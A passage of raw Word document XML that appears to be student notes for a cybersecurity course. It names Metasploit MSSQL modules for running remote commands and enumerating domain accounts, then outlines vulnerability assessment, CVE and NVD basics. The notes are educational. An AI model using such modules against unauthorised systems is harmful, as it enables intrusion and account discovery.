      </w:pPr>
    </w:p>
    <w:p w14:paraId="38FC4251" w14:textId="622D76D7" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/admin/mssql/mssql_exec”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2DD34" w14:textId="3A2B98D5" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Execute commands on the remote server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8A4B7A" w14:textId="3D13C2F9" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CMD allows you to set any command for the module to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CC7AC" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A23FAD6" w14:textId="52085AAD" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/admin/mssql/mssql_enum_domain_accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76423FD6" w14:textId="3D0791A9" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>I mean, its in the name (its going to enumerate domain accounts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5272038A" w14:textId="698C0E76" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will display those domain accounts, if applicable, to the output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC8EB1" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0D9D51" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B41482B" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0301D5B3" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765F0510" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09FBB2E1" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541F24B2" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40130E3F" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BD7A6D" w14:textId="77777777" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675230D6" w14:textId="7A908273" w:rsidR="007159A0" w:rsidRPr="002A77BD" w:rsidRDefault="007159A0" w:rsidP="007159A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>VULNERABILITY ASSESSMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE0BBBD" w14:textId="77777777" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="007159A0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE16CD4" w14:textId="79A07DFB" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2F0043" w14:textId="0C37B071" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Case Studies</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Heartbleed</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ EternalBlue</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Log4J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA59632" w14:textId="50C0A463" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Labs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F9B95A" w14:textId="74B34395" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Nessus</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ Exploit DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DB3B4" w14:textId="77777777" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2D9071" w14:textId="1AEFDE19" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>What is a vulnerability? (NIST Definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9FDF99" w14:textId="04750F2E" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A weakness in computational logic (e.g., code) found in software and hardware components that, when exploited, results in a negative impact on confidentiality, integrity, and availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368E019" w14:textId="77777777" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304F1ED9" w14:textId="76F26653" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Cybersecurity vulnerabilities are weaknesses in software/hardware that can be exploited by a threat actor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B5493" w14:textId="1F7CF385" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Software</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
        <w:t>+ Operating System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15534F91" w14:textId="77777777" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B051D5" w14:textId="150F515A" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Found by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD52F4C" w14:textId="29275A58" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>DevSecOps engineers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EA55E8" w14:textId="74A9F1EB" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Security Researchers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03150E30" w14:textId="44CC12DE" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Pen Testers (US)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D09C9E7" w14:textId="1C1C140A" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Software Developers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4416D948" w14:textId="047B4A17" w:rsidR="00721CDA" w:rsidRPr="002A77BD" w:rsidRDefault="00721CDA" w:rsidP="00721CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Users, on accident?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53269AAC" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A81E9FE" w14:textId="3E345887" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CVE (Common Vulnerabilities and Exposures)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DF6DBE" w14:textId="793506F6" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Funded by DHS, CVEs monitored by MITRE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E457FB0" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4992C2BC" w14:textId="0E3305CF" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NVD (National Vulnerability Database)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D2966" w14:textId="0CB6CBF4" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NIST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D71EB" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B0AA04F" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61468927" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603C0E3F" w14:textId="2E54A4A9" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE Identifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AD2033" w14:textId="3DEF15E1" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Also called:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E2D162" w14:textId="180832FA" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ CVE names</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ CVE numbers</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ CVE-IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ CVEs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561313BD" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DB1DAC1" w14:textId="0AB1A825" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Unique, common identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC888B1" w14:textId="4217165A" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Examples</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
